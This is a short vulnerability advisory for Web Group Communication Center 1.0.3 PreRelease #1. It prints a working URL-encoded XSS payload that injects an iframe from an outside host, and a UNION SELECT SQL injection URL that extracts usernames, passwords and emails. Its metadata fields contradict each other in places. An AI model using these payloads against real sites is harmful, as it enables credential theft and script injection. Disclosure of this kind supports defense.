vendor:
Web Group Communication Center
by:
myvx
7.5
CVSS
HIGH
XSS/SQL Injection
89
CWE
Product Name: Web Group Communication Center
Affected Version From: 1.0.3 PreRelease #1
Affected Version To: 1.0.3 PreRelease #1
Patch Exists: NO
Related CWE: N/A
CPE: a:wgcc:web_group_communication_center
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Web Group Communication Center [XSS/SQL] Multiple Remote Vulnerabilies
The application is vulnerable to XSS and SQL Injection. An attacker can inject malicious code in the application by using the URL http://[target]/[path]/profile.php?action=show&userid=%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%D%68%74%74%70%3A%2F%2F%68%61%2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%74%6C%65%74%2E%68%74%6D%6C%3C. An attacker can also use the SQL injection vulnerability to gain access to the application's database by using the URL http://[target]/[path]/profile.php?action=show&saction=moreinfo&userid=-1+UNION+SELECT+1,concat(username,0x3a,password,0x3a,email)+FROM+wgcc_user--. There are also other URLs which can be used to exploit the SQL injection vulnerability.
Mitigation:
The application should be tested for XSS and SQL injection vulnerabilities. Input validation should be implemented to prevent malicious code from being injected into the application. The application should also be updated to the latest version.